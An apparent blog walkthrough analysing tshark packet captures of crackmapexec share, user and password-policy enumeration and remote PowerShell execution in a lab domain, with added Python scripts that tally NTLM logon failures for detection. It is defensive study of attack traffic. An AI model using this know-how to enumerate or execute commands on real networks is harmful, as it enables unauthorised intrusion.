  arp                                    frames:5 bytes:300
  ip                                     frames:482 bytes:130903
    tcp                                  frames:482 bytes:130903
      nbss                               frames:394 bytes:115138
        smb                              frames:8 bytes:1016
        smb2                             frames:386 bytes:114122
          tcp.segments                   frames:2 bytes:2764
===================================================================

From above we see both SMB and SMB2 conversations. I take that to mean that the conversation probably started on SMB1 and then negotiated up to SMB2.

Let's look into the conversations.

root@securitynik:~/cme# tshark -n -r cme-enum-shares.pcap -z conv,tcp -q
================================================================================
TCP Conversations
Filter:<No Filter>
                                                           |       <-      | |       ->      | |     Total     |    Relative    |   Duration   |
                                                           | Frames  Bytes | | Frames  Bytes | | Frames  Bytes |      Start     |              |
10.0.0.100:35710           <-> 10.0.0.105:445                  88     32754      95     19205     183     51959     4.701908000         1.3409
10.0.0.100:52026           <-> 10.0.0.103:445                  77     32785      88     19170     165     51955     4.702229000         1.3245
10.0.0.100:41024           <-> 10.0.0.3:445                    13      3322      17      3681      30      7003     4.778967000         1.2455
10.0.0.100:35716           <-> 10.0.0.105:445                  14      2952      15      2945      29      5897     4.797176000         1.2259
10.0.0.100:52032           <-> 10.0.0.103:445                  13      3074      15      2883      28      5957     5.162347000         0.8619
10.0.0.100:35708           <-> 10.0.0.105:445                   8      1512      10      1154      18      2666     4.658157000         1.3651
10.0.0.100:41016           <-> 10.0.0.3:445                     7      1729       8      1030      15      2759     4.657942000         0.1189
10.0.0.100:52018           <-> 10.0.0.103:445                   6      1677       8      1030      14      2707     4.657751000         0.0437
================================================================================

Let's do like the previous instance and look into one of the conversations. Let's take the first one with source port 35710.


root@securitynik:~/cme# tshark -n -r cme-enum-shares.pcap -Y "( ip.addr == 10.0.0.100 ) && ( ip.addr == 10.0.0.105 ) && ( tcp.port ==35710 ) && ( tcp.port == 445 )" | more
   35   4.701908   10.0.0.100 → 10.0.0.105   TCP 74 35710 → 445 [SYN] Seq=0 Win=29200 Len=0 MSS=1460 SACK_PERM=1 TSval=2860773415 TSecr=0 WS=128
   37   4.702292   10.0.0.105 → 10.0.0.100   TCP 66 445 → 35710 [SYN, ACK] Seq=0 Ack=1 Win=65535 Len=0 MSS=1460 WS=256 SACK_PERM=1
   38   4.702307   10.0.0.100 → 10.0.0.105   TCP 54 35710 → 445 [ACK] Seq=1 Ack=1 Win=29312 Len=0
   41   4.703211   10.0.0.100 → 10.0.0.105   SMB 127 Negotiate Protocol Request
   44   4.706059   10.0.0.105 → 10.0.0.100   SMB2 306 Negotiate Protocol Response
   45   4.706077   10.0.0.100 → 10.0.0.105   TCP 54 35710 → 445 [ACK] Seq=74 Ack=253 Win=30336 Len=0
   48   4.709555   10.0.0.100 → 10.0.0.105   SMB2 164 Negotiate Protocol Request
   49   4.710187   10.0.0.105 → 10.0.0.100   SMB2 306 Negotiate Protocol Response
   52   4.719150   10.0.0.100 → 10.0.0.105   SMB2 212 Session Setup Request, NTLMSSP_NEGOTIATE
   53   4.719743   10.0.0.105 → 10.0.0.100   SMB2 449 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE
   56   4.728556   10.0.0.100 → 10.0.0.105   SMB2 604 Session Setup Request, NTLMSSP_AUTH, User: SECURITYNIK\administrator
   57   4.731502   10.0.0.105 → 10.0.0.100   SMB2 130 Session Setup Response, Error: STATUS_LOGON_FAILURE
   59   4.734839   10.0.0.100 → 10.0.0.105   SMB2 212 Session Setup Request, NTLMSSP_NEGOTIATE
   62   4.736363   10.0.0.105 → 10.0.0.100   SMB2 449 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE
   63   4.753927   10.0.0.100 → 10.0.0.105   SMB2 604 Session Setup Request, NTLMSSP_AUTH, User: SECURITYNIK\administrator
   64   4.756372   10.0.0.105 → 10.0.0.100   SMB2 130 Session Setup Response, Error: STATUS_LOGON_FAILURE
   68   4.760402   10.0.0.100 → 10.0.0.105   SMB2 212 Session Setup Request, NTLMSSP_NEGOTIATE
   69   4.761060   10.0.0.105 → 10.0.0.100   SMB2 449 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE
   72   4.772888   10.0.0.100 → 10.0.0.105   SMB2 604 Session Setup Request, NTLMSSP_AUTH, User: SECURITYNIK\administrator
   74   4.775421   10.0.0.105 → 10.0.0.100   SMB2 130 Session Setup Response, Error: STATUS_LOGON_FAILURE
   76   4.778370   10.0.0.100 → 10.0.0.105   SMB2 212 Session Setup Request, NTLMSSP_NEGOTIATE
   78   4.779050   10.0.0.105 → 10.0.0.100   SMB2 449 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE
   81   4.786392   10.0.0.100 → 10.0.0.105   SMB2 604 Session Setup Request, NTLMSSP_AUTH, User: SECURITYNIK\administrator
   85   4.789841   10.0.0.105 → 10.0.0.100   SMB2 139 Session Setup Response
  103   4.829145   10.0.0.105 → 10.0.0.100   TCP 139 [TCP Retransmission] 445 → 35710 [PSH, ACK] Seq=2313 Ack=3016 Win=2100736 Len=85
  104   4.829160   10.0.0.100 → 10.0.0.105   TCP 66 35710 → 445 [ACK] Seq=3016 Ack=2398 Win=35712 Len=0 SLE=2313 SRE=2398
  118   4.870576   10.0.0.100 → 10.0.0.105   SMB2 216 Encrypted SMB3
  119   4.870976   10.0.0.105 → 10.0.0.100   SMB2 190 Encrypted SMB3
  120   4.870995   10.0.0.100 → 10.0.0.105   TCP 54 35710 → 445 [ACK] Seq=3178 Ack=2534 Win=36736 Len=0
...........
  463   5.966266   10.0.0.105 → 10.0.0.100   SMB2 182 Encrypted SMB3
  464   5.970495   10.0.0.100 → 10.0.0.105   SMB2 178 Encrypted SMB3
  465   5.970824   10.0.0.105 → 10.0.0.100   SMB2 178 Encrypted SMB3
  468   6.013389   10.0.0.100 → 10.0.0.105   TCP 54 35710 → 445 [ACK] Seq=14032 Ack=27752 Win=185856 Len=0
  484   6.040763   10.0.0.100 → 10.0.0.105   TCP 54 35710 → 445 [FIN, ACK] Seq=14032 Ack=27752 Win=185856 Len=0
  485   6.041096   10.0.0.105 → 10.0.0.100   TCP 60 445 → 35710 [ACK] Seq=27752 Ack=14033 Win=2102272 Len=0
  486   6.042828   10.0.0.105 → 10.0.0.100   TCP 60 445 → 35710 [RST, ACK] Seq=27752 Ack=14033 Win=0 Len=0

Uh oh!! Looks like this communication is encrypted with SMB3. However, if you pay close attention above, we see a number of "STATUS_LOGON_FAILURE" responses for "SECURITYNIK\administrator" before the Session Setup finally succeeds in frame 85. Let's leave this for now. Do note also that most of the other conversations look much the same.
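Even though the share enumeration itself is hidden inside Encrypted SMB3, the NTLM authentication that precedes it is not, and the run of STATUS_LOGON_FAILURE responses followed by one success is exactly the pattern a defender wants to pull out of the capture. As an added example (my own code, not from the post), here is a correlator that reads the one-line-per-frame summary tshark prints, pairs every "Session Setup Request, NTLMSSP_AUTH" with the next Session Setup Response from the same server, and tallies successes and failures per server and user. The sample lines are the frames from the conversation above; `flag_repeated_failures` and its threshold of 3 are my own additions.

```python
import re
from collections import defaultdict

# Frames copied from the tshark summary output above (the SMB2 session setup part).
SAMPLE_SUMMARY = r"""
   52   4.719150   10.0.0.100 → 10.0.0.105   SMB2 212 Session Setup Request, NTLMSSP_NEGOTIATE
   53   4.719743   10.0.0.105 → 10.0.0.100   SMB2 449 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE
   56   4.728556   10.0.0.100 → 10.0.0.105   SMB2 604 Session Setup Request, NTLMSSP_AUTH, User: SECURITYNIK\administrator
   57   4.731502   10.0.0.105 → 10.0.0.100   SMB2 130 Session Setup Response, Error: STATUS_LOGON_FAILURE
   59   4.734839   10.0.0.100 → 10.0.0.105   SMB2 212 Session Setup Request, NTLMSSP_NEGOTIATE
   62   4.736363   10.0.0.105 → 10.0.0.100   SMB2 449 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE
   63   4.753927   10.0.0.100 → 10.0.0.105   SMB2 604 Session Setup Request, NTLMSSP_AUTH, User: SECURITYNIK\administrator
   64   4.756372   10.0.0.105 → 10.0.0.100   SMB2 130 Session Setup Response, Error: STATUS_LOGON_FAILURE
   72   4.772888   10.0.0.100 → 10.0.0.105   SMB2 604 Session Setup Request, NTLMSSP_AUTH, User: SECURITYNIK\administrator
   74   4.775421   10.0.0.105 → 10.0.0.100   SMB2 130 Session Setup Response, Error: STATUS_LOGON_FAILURE
   81   4.786392   10.0.0.100 → 10.0.0.105   SMB2 604 Session Setup Request, NTLMSSP_AUTH, User: SECURITYNIK\administrator
   85   4.789841   10.0.0.105 → 10.0.0.100   SMB2 139 Session Setup Response
  118   4.870576   10.0.0.100 → 10.0.0.105   SMB2 216 Encrypted SMB3
"""

# frame, relative time, src, dst, protocol, length, info
SUMMARY_RE = re.compile(
    r"^\s*(?P<frame>\d+)\s+(?P<time>[\d.]+)\s+(?P<src>\S+)\s+→\s+(?P<dst>\S+)\s+"
    r"(?P<proto>\S+)\s+(?P<len>\d+)\s+(?P<info>.*)$")
AUTH_RE = re.compile(r"Session Setup Request, NTLMSSP_AUTH, User: (?P<user>\S+)")
RESP_RE = re.compile(r"Session Setup Response(?:, Error: (?P<status>[A-Z_]+))?")


def correlate_logons(summary_text: str) -> dict:
    """Tally NTLM logon outcomes as {(server_ip, user): {success, failure, statuses}}.
    An NTLMSSP_AUTH request is matched to the next Session Setup Response that
    flows back from the same server to the same client."""
    pending = {}   # (client, server) -> user whose AUTH is awaiting a response
    tally = defaultdict(lambda: {"success": 0, "failure": 0, "statuses": []})
    for line in summary_text.splitlines():
        m = SUMMARY_RE.match(line)
        if not m:
            continue
        src, dst, info = m["src"], m["dst"], m["info"]
        auth = AUTH_RE.search(info)
        if auth:
            pending[(src, dst)] = auth["user"]
            continue
        resp = RESP_RE.search(info)
        if resp and (dst, src) in pending:          # response travels server -> client
            user = pending.pop((dst, src))
            rec = tally[(src, user)]
            if resp["status"] is None:
                rec["success"] += 1
            else:
                rec["failure"] += 1
                rec["statuses"].append(resp["status"])
    return dict(tally)


def flag_repeated_failures(tally: dict, threshold: int = 3):
    """Return the (server, user) pairs with at least `threshold` failed logons."""
    return sorted(k for k, v in tally.items() if v["failure"] >= threshold)


if __name__ == "__main__":
    results = correlate_logons(SAMPLE_SUMMARY)
    for (server, user), v in results.items():
        print(f"{server} {user}: {v['failure']} failed, {v['success']} succeeded")
    print("flagged:", flag_repeated_failures(results))
```

One caveat: the summary line carries no TCP ports, so two parallel streams between the same client and server would be pooled together here. For a real capture, add `-e tcp.stream` to a `-T fields` run and key `pending` on the stream index instead of the address pair. On the host side, the same three failures show up as Windows event 4625 with logon type 3 followed by a 4624, which is the log-analysis tie-in the post refers to.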

Let's now transition to the enumeration of the users and groups, to see what we can learn from the packets.

Looking at the traffic from the user enumeration, if we start with the conversations, we see 10 conversations being reported in the pcap file. If we look at the first one with port 36662, we see this ties back into our log analysis. Let's take a look at these packets to see what we can learn.


root@securitynik:~/cme# tshark -n -r cme-enum-users.pcap -z conv,tcp -q
================================================================================
TCP Conversations
Filter:<No Filter>
                                                           |       <-      | |       ->      | |     Total     |    Relative    |   Duration   |
                                                           | Frames  Bytes | | Frames  Bytes | | Frames  Bytes |      Start     |              |
10.0.0.100:36662           <-> 10.0.0.105:445                  81     20594      78     18654     159     39248     9.171767000         1.2807
10.0.0.100:52980           <-> 10.0.0.103:445                  58     15862      60     14173     118     30035     9.321117000         0.6187
10.0.0.100:36660           <-> 10.0.0.105:445                  13      2714      15      2933      28      5647     9.060796000         1.3251
10.0.0.100:52978           <-> 10.0.0.103:445                  13      3074      15      2887      28      5961     9.208452000         1.1786
10.0.0.100:36652           <-> 10.0.0.105:445                   9      1638      10      1166      19      2804     8.944584000         1.5418
10.0.0.100:41964           <-> 10.0.0.3:445                     7      1729      11      1451      18      3180     8.997733000         1.4911
10.0.0.100:52972           <-> 10.0.0.103:445                   7      1746      11      1459      18      3205     8.998512000         1.4915
10.0.0.100:36656           <-> 10.0.0.105:445                   8      1525       9      1409      17      2934     8.998254000         1.5223
10.0.0.100:52962           <-> 10.0.0.103:445                   6      1677       8      1030      14      2707     8.944150000         0.0536
10.0.0.100:41960           <-> 10.0.0.3:445                     6      1669       8      1030      14      2699     8.944373000         0.0425
================================================================================

Looking at the actual packets now


root@securitynik:~/cme# tshark -n -r cme-enum-users.pcap -Y "( tcp.port == 36662 ) && ( tcp.port == 445 )"
  109   9.171767   10.0.0.100 → 10.0.0.105   TCP 74 36662 → 445 [SYN] Seq=0 Win=29200 Len=0 MSS=1460 SACK_PERM=1 TSval=2872505954 TSecr=0 WS=128
  110   9.172057   10.0.0.105 → 10.0.0.100   TCP 66 445 → 36662 [SYN, ACK] Seq=0 Ack=1 Win=65535 Len=0 MSS=1460 WS=256 SACK_PERM=1
  111   9.172070   10.0.0.100 → 10.0.0.105   TCP 54 36662 → 445 [ACK] Seq=1 Ack=1 Win=29312 Len=0
  113   9.180091   10.0.0.100 → 10.0.0.105   SMB 127 Negotiate Protocol Request
  115   9.193928   10.0.0.105 → 10.0.0.100   TCP 60 445 → 36662 [ACK] Seq=1 Ack=74 Win=2102272 Len=0
  130   9.223667   10.0.0.105 → 10.0.0.100   SMB2 306 Negotiate Protocol Response
  131   9.223681   10.0.0.100 → 10.0.0.105   TCP 54 36662 → 445 [ACK] Seq=74 Ack=253 Win=30336 Len=0
  135   9.230843   10.0.0.100 → 10.0.0.105   SMB2 164 Negotiate Protocol Request
  143   9.256814   10.0.0.105 → 10.0.0.100   TCP 60 445 → 36662 [ACK] Seq=253 Ack=184 Win=2102272 Len=0
  193   9.550036   10.0.0.105 → 10.0.0.100   SMB2 306 Negotiate Protocol Response
  196   9.554980   10.0.0.100 → 10.0.0.105   SMB2 212 Session Setup Request, NTLMSSP_NEGOTIATE
  197   9.557240   10.0.0.105 → 10.0.0.100   SMB2 449 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE
  200   9.572289   10.0.0.100 → 10.0.0.105   SMB2 604 Session Setup Request, NTLMSSP_AUTH, User: SECURITYNIK\administrator
  201   9.574589   10.0.0.105 → 10.0.0.100   SMB2 139 Session Setup Response
  206   9.591850   10.0.0.100 → 10.0.0.105   SMB2 216 Encrypted SMB3
  207   9.593175   10.0.0.105 → 10.0.0.100   SMB2 190 Encrypted SMB3
  210   9.607005   10.0.0.100 → 10.0.0.105   SMB2 238 Encrypted SMB3
  211   9.607508   10.0.0.105 → 10.0.0.100   SMB2 262 Encrypted SMB3
  214   9.617532   10.0.0.100 → 10.0.0.105   SMB2 294 Encrypted SMB3
  215   9.617975   10.0.0.105 → 10.0.0.100   SMB2 190 Encrypted SMB3
  218   9.628218   10.0.0.100 → 10.0.0.105   SMB2 223 Encrypted SMB3
  219   9.628717   10.0.0.105 → 10.0.0.100   SMB2 258 Encrypted SMB3
  222   9.639361   10.0.0.100 → 10.0.0.105   SMB2 258 Encrypted SMB3
....
  423  10.449068   10.0.0.100 → 10.0.0.105   SMB2 178 Encrypted SMB3
  424  10.449465   10.0.0.105 → 10.0.0.100   SMB2 178 Encrypted SMB3
  425  10.451778   10.0.0.100 → 10.0.0.105   SMB2 178 Encrypted SMB3
  426  10.452430   10.0.0.105 → 10.0.0.100   TCP 60 445 → 36662 [RST, ACK] Seq=16173 Ack=14423 Win=0 Len=0

Uh Oh. From above we see that this traffic is also encrypted. This makes it difficult for our security monitoring tools to effectively do their jobs.
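The session setup happens before SMB3 encryption starts, so the NTLMSSP_AUTH user name and any STATUS_LOGON_FAILURE response are the fields a monitoring tool can still key on even when everything after them is opaque. The Python below is an added example, not code from this post or from crackmapexec: it parses tshark one-line summaries of the form shown above (the sample lines are constructed, modelled on this post's output, and include a STATUS_LOGON_FAILURE response of the kind the post mentions) and builds a per-client tally of authentication attempts, user names, anonymous logons, logon failures and encrypted frames.

```python
import re
from collections import defaultdict

# Constructed sample, modelled on the tshark one-line summaries shown in this post.
SAMPLE_TSHARK_LINES = """\
  196   9.554980   10.0.0.100 → 10.0.0.105   SMB2 212 Session Setup Request, NTLMSSP_NEGOTIATE
  197   9.557240   10.0.0.105 → 10.0.0.100   SMB2 449 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE
  200   9.572289   10.0.0.100 → 10.0.0.105   SMB2 604 Session Setup Request, NTLMSSP_AUTH, User: SECURITYNIK\\administrator
  201   9.574589   10.0.0.105 → 10.0.0.100   SMB2 139 Session Setup Response
  206   9.591850   10.0.0.100 → 10.0.0.105   SMB2 216 Encrypted SMB3
  207   9.593175   10.0.0.105 → 10.0.0.100   SMB2 190 Encrypted SMB3
   13   3.229892   10.0.0.100 → 10.0.0.105   SMB2 235 Session Setup Request, NTLMSSP_AUTH, User: \\
   14   3.230867   10.0.0.105 → 10.0.0.100   SMB2 139 Session Setup Response, Error: STATUS_LOGON_FAILURE
"""

# One tshark summary line: frame, time, src → dst, protocol, length, info.
TSHARK_LINE = re.compile(
    r"^\s*(?P<frame>\d+)\s+(?P<time>[\d.]+)\s+(?P<src>\S+)\s+→\s+(?P<dst>\S+)"
    r"\s+(?P<proto>\S+)\s+(?P<length>\d+)\s+(?P<info>.*)$"
)
USER_FIELD = re.compile(r"User:\s*(?P<user>\S*)")


def parse_line(line):
    """Split one tshark summary line into fields; None for lines that are not summaries."""
    m = TSHARK_LINE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec["frame"] = int(rec["frame"])
    rec["length"] = int(rec["length"])
    return rec


def new_client_stats():
    return {"auth_attempts": 0, "anonymous_attempts": 0, "users": set(),
            "logon_failures": 0, "encrypted_frames": 0}


def summarize(text):
    """Tally the pre-encryption SMB2 fields per IP (keyed on the sender of each frame,
    except logon failures, which the server sends and are attributed to the client)."""
    stats = defaultdict(new_client_stats)
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        info = rec["info"]
        if "NTLMSSP_AUTH" in info:
            # The client's AUTHENTICATE message carries the user name in clear.
            s = stats[rec["src"]]
            s["auth_attempts"] += 1
            um = USER_FIELD.search(info)
            user = um.group("user") if um else ""
            if user.strip("\\") == "":
                s["anonymous_attempts"] += 1    # "User: \" is an anonymous (null) logon
            else:
                s["users"].add(user)
        elif "STATUS_LOGON_FAILURE" in info:
            stats[rec["dst"]]["logon_failures"] += 1
        elif "Encrypted SMB3" in info:
            stats[rec["src"]]["encrypted_frames"] += 1
    # Plain, sorted structures so the result is easy to compare and serialize.
    return {ip: {**s, "users": sorted(s["users"])} for ip, s in stats.items()}


def sources_over_threshold(summary, min_attempts=2):
    """IPs that sent at least min_attempts NTLMSSP_AUTH messages."""
    return sorted(ip for ip, s in summary.items() if s["auth_attempts"] >= min_attempts)


if __name__ == "__main__":
    report = summarize(SAMPLE_TSHARK_LINES)
    for ip, s in report.items():
        print(ip, s)
    print("clients over threshold:", sources_over_threshold(report))
```

Feed it `tshark -n -r file.pcap -Y smb2` output and the anonymous-logon count, the distinct user names and the failure count per client are what a detection rule can alert on; the encrypted frame count tells you how much of the rest of the session is out of reach for content inspection.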

Since the previous session was encrypted, let's now see what we can get from the packets associated with the password policy enumeration.

Without further ado, let's take a look at the packet capture to see what type of traffic might be in here.

Looking at the protocol hierarchy, we see some SMB and SMB2 traffic.

root@securitynik:~/cme# tshark -n -r cme-pass-pol.pcap -z io,phs -q
===================================================================
Protocol Hierarchy Statistics
Filter: 

eth                                      frames:113 bytes:21694
  arp                                    frames:2 bytes:102
  ip                                     frames:111 bytes:21592
    tcp                                  frames:111 bytes:21592
      nbss                               frames:78 bytes:19550
        smb                              frames:4 bytes:508
        smb2                             frames:74 bytes:19042
===================================================================

Looking at above, I would conclude that there is no encrypted traffic. Let's see if that is true.

Peeking first into SMB traffic, we see:


root@securitynik:~/cme# tshark -n -r cme-pass-pol.pcap -Y "smb"
    6   3.214791   10.0.0.100 → 10.0.0.105   SMB 127 Negotiate Protocol Request
   20   3.237020   10.0.0.100 → 10.0.0.105   SMB 127 Negotiate Protocol Request
   34   3.279046   10.0.0.100 → 10.0.0.105   SMB 127 Negotiate Protocol Request
   59   3.394125   10.0.0.100 → 10.0.0.105   SMB 127 Negotiate Protocol Request

From above, we see the SMB packets all seem to be associated with the SMB Negotiate Protocol Request. I would assume at this point the server responded stating that it would like to use SMB2, which is why we do not see any additional SMB (version 1) traffic.

Let's now look into the SMB2 traffic.


root@securitynik:~/cme# tshark -n -r cme-pass-pol.pcap -Y "smb2"
    7   3.215534   10.0.0.105 → 10.0.0.100   SMB2 306 Negotiate Protocol Response
    9   3.218110   10.0.0.100 → 10.0.0.105   SMB2 164 Negotiate Protocol Request
   10   3.218617   10.0.0.105 → 10.0.0.100   SMB2 306 Negotiate Protocol Response
   11   3.222438   10.0.0.100 → 10.0.0.105   SMB2 212 Session Setup Request, NTLMSSP_NEGOTIATE
   12   3.224476   10.0.0.105 → 10.0.0.100   SMB2 449 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE
   13   3.229892   10.0.0.100 → 10.0.0.105   SMB2 235 Session Setup Request, NTLMSSP_AUTH, User: \
   14   3.230867   10.0.0.105 → 10.0.0.100   SMB2 139 Session Setup Response
   15   3.234048   10.0.0.100 → 10.0.0.105   SMB2 126 Session Logoff Request
   16   3.234344   10.0.0.105 → 10.0.0.100   SMB2 126 Session Logoff Response
   21   3.238371   10.0.0.105 → 10.0.0.100   SMB2 306 Negotiate Protocol Response
   23   3.241025   10.0.0.100 → 10.0.0.105   SMB2 164 Negotiate Protocol Request
   24   3.241635   10.0.0.105 → 10.0.0.100   SMB2 306 Negotiate Protocol Response
   25   3.248880   10.0.0.100 → 10.0.0.105   SMB2 212 Session Setup Request, NTLMSSP_NEGOTIATE
   26   3.249527   10.0.0.105 → 10.0.0.100   SMB2 449 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE
   27   3.256058   10.0.0.100 → 10.0.0.105   SMB2 604 Session Setup Request, NTLMSSP_AUTH, User: SECURITYNIK\administrator
   28   3.258185   10.0.0.105 → 10.0.0.100   SMB2 139 Session Setup Response
   35   3.279840   10.0.0.105 → 10.0.0.100   SMB2 306 Negotiate Protocol Response
   37   3.293799   10.0.0.100 → 10.0.0.105   SMB2 164 Negotiate Protocol Request
   38   3.294739   10.0.0.105 → 10.0.0.100   SMB2 306 Negotiate Protocol Response
   39   3.298425   10.0.0.100 → 10.0.0.105   SMB2 212 Session Setup Request, NTLMSSP_NEGOTIATE
   41   3.299181   10.0.0.105 → 10.0.0.100   SMB2 449 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE
   42   3.305931   10.0.0.100 → 10.0.0.105   SMB2 604 Session Setup Request, NTLMSSP_AUTH, User: SECURITYNIK\administrator
   43   3.308715   10.0.0.105 → 10.0.0.100   SMB2 139 Session Setup Response
   44   3.313429   10.0.0.100 → 10.0.0.105   SMB2 216 Encrypted SMB3
   45   3.313913   10.0.0.105 → 10.0.0.100   SMB2 190 Encrypted SMB3
   .....
   54   3.377248   10.0.0.100 → 10.0.0.105   SMB2 223 Encrypted SMB3
   55   3.377657   10.0.0.105 → 10.0.0.100   SMB2 238 Encrypted SMB3
   60   3.396247   10.0.0.105 → 10.0.0.100   SMB2 306 Negotiate Protocol Response
   62   3.400194   10.0.0.100 → 10.0.0.105   SMB2 164 Negotiate Protocol Request
   63   3.400920   10.0.0.105 → 10.0.0.100   SMB2 306 Negotiate Protocol Response
   64   3.412338   10.0.0.100 → 10.0.0.105   SMB2 212 Session Setup Request, NTLMSSP_NEGOTIATE
   65   3.413306   10.0.0.105 → 10.0.0.100   SMB2 449 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE
   67   3.434020   10.0.0.100 → 10.0.0.105   SMB2 604 Session Setup Request, NTLMSSP_AUTH, User: SECURITYNIK\administrator
   68   3.436640   10.0.0.105 → 10.0.0.100   SMB2 139 Session Setup Response
   69   3.451598   10.0.0.100 → 10.0.0.105   SMB2 216 Encrypted SMB3 
   77   3.522068   10.0.0.100 → 10.0.0.105   SMB2 258 Encrypted SMB3
   78   3.522898   10.0.0.105 → 10.0.0.100   SMB2 190 Encrypted SMB3
   ......
   99   3.704565   10.0.0.100 → 10.0.0.105   SMB2 223 Encrypted SMB3
  100   3.704911   10.0.0.105 → 10.0.0.100   SMB2 246 Encrypted SMB3

Holy smack! Looks like yet another set of encrypted traffic. Well, nothing else to see here at this time. Let's move on to see what things look like when we execute remote commands.

Let's now see what the communication looks like when crackmapexec runs a powershell command.

As always, when we first look at our pcap file, we look at the protocol hierarchy to understand what is in the file. Let's do that.

root@securitynik:~/cme# tshark -n -r cme-powershell.pcap -z io,phs -q
===================================================================
Protocol Hierarchy Statistics
Filter: 

eth                                      frames:247 bytes:82427
  arp                                    frames:8 bytes:408
  ip                                     frames:239 bytes:82019
    udp                                  frames:4 bytes:860
      ssdp                               frames:4 bytes:860
    tcp                                  frames:235 bytes:81159
      nbss                               frames:121 bytes:29648
        smb                              frames:3 bytes:381
        smb2                             frames:118 bytes:29267
          tcp.segments                   frames:1 bytes:2742
      dcerpc                             frames:31 bytes:40114
        isystemactivator                 frames:2 bytes:1644
        remunk                           frames:2 bytes:300
        dcerpc.stub_data                 frames:5 bytes:21630
        dcerpc.fragments                 frames:1 bytes:790
===================================================================


Looking at the SMB communication, we see below once again that this is more than likely the client trying to communicate via SMB version 1.


root@securitynik:~/cme# tshark -n -r cme-powershell.pcap -Y "smb"
   16  43.408475   10.0.0.100 → 10.0.0.105   SMB 127 Negotiate Protocol Request
   30  43.435753   10.0.0.100 → 10.0.0.105   SMB 127 Negotiate Protocol Request
   42  43.463106   10.0.0.100 → 10.0.0.105   SMB 127 Negotiate Protocol Request

Once again let's look at the SMB2 communication.


root@securitynik:~/cme# tshark -n -r cme-powershell.pcap -Y "smb2"
   17  43.409255   10.0.0.105 → 10.0.0.100   SMB2 306 Negotiate Protocol Response
   19  43.413105   10.0.0.100 → 10.0.0.105   SMB2 164 Negotiate Protocol Request
   20  43.413704   10.0.0.105 → 10.0.0.100   SMB2 306 Negotiate Protocol Response
   21  43.418281   10.0.0.100 → 10.0.0.105   SMB2 212 Session Setup Request, NTLMSSP_NEGOTIATE
   22  43.418780   10.0.0.105 → 10.0.0.100   SMB2 449 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE
   23  43.426458   10.0.0.100 → 10.0.0.105   SMB2 235 Session Setup Request, NTLMSSP_AUTH, User: \
   24  43.427636   10.0.0.105 → 10.0.0.100   SMB2 139 Session Setup Response
   25  43.432235   10.0.0.100 → 10.0.0.105   SMB2 126 Session Logoff Request
   26  43.432623   10.0.0.105 → 10.0.0.100   SMB2 126 Session Logoff Response
   31  43.437344   10.0.0.105 → 10.0.0.100   SMB2 306 Negotiate Protocol Response
   33  43.440996   10.0.0.100 → 10.0.0.105   SMB2 164 Negotiate Protocol Request
   34  43.441606   10.0.0.105 → 10.0.0.100   SMB2 306 Negotiate Protocol Response
   35  43.446277   10.0.0.100 → 10.0.0.105   SMB2 212 Session Setup Request, NTLMSSP_NEGOTIATE
   36  43.446815   10.0.0.105 → 10.0.0.100   SMB2 449 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE
   37  43.455948   10.0.0.100 → 10.0.0.105   SMB2 604 Session Setup Request, NTLMSSP_AUTH, User: SECURITYNIK\administrator
   38  43.458155   10.0.0.105 → 10.0.0.100   SMB2 139 Session Setup Response
   43  43.464624   10.0.0.105 → 10.0.0.100   SMB2 306 Negotiate Protocol Response
   45  43.468269   10.0.0.100 → 10.0.0.105   SMB2 164 Negotiate Protocol Request
   46  43.468962   10.0.0.105 → 10.0.0.100   SMB2 306 Negotiate Protocol Response
   49  43.473830   10.0.0.100 → 10.0.0.105   SMB2 212 Session Setup Request, NTLMSSP_NEGOTIATE
   50  43.474372   10.0.0.105 → 10.0.0.100   SMB2 449 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE
   51  43.481931   10.0.0.100 → 10.0.0.105   SMB2 604 Session Setup Request, NTLMSSP_AUTH, User: SECURITYNIK\administrator
   52  43.484388   10.0.0.105 → 10.0.0.100   SMB2 139 Session Setup Response
....
  227  47.334141   10.0.0.105 → 10.0.0.100   SMB2 234 Encrypted SMB3
  228  47.338399   10.0.0.100 → 10.0.0.105   SMB2 178 Encrypted SMB3
  229  47.343532   10.0.0.105 → 10.0.0.100   SMB2 178 Encrypted SMB3

So far we have seen that the majority of this tool's SMB communication is encrypted. Let's see if there is anything we can learn from the "dcerpc" communication.


root@securitynik:~/cme# tshark -n -r cme-powershell.pcap -Y "dcerpc"
   70  43.594887   10.0.0.100 → 10.0.0.105   DCERPC 166 Bind: call_id: 1, Fragment: Single, 1 context items: ISystemActivator V0.0 (32bit NDR), NTLMSSP_NEGOTIATE
   71  43.595566   10.0.0.105 → 10.0.0.100   DCERPC 406 Bind_ack: call_id: 1, Fragment: Single, max_xmit: 4280 max_recv: 4280, 1 results: Acceptance, NTLMSSP_CHALLENGE
   73  43.603971   10.0.0.100 → 10.0.0.105   DCERPC 524 AUTH3: call_id: 1, Fragment: Single, NTLMSSP_AUTH, User: SECURITYNIK\administrator
   76  43.640433   10.0.0.100 → 10.0.0.105   ISystemActivator 566 RemoteCreateInstance request
   77  43.645133   10.0.0.105 → 10.0.0.100   ISystemActivator 1078 RemoteCreateInstance response
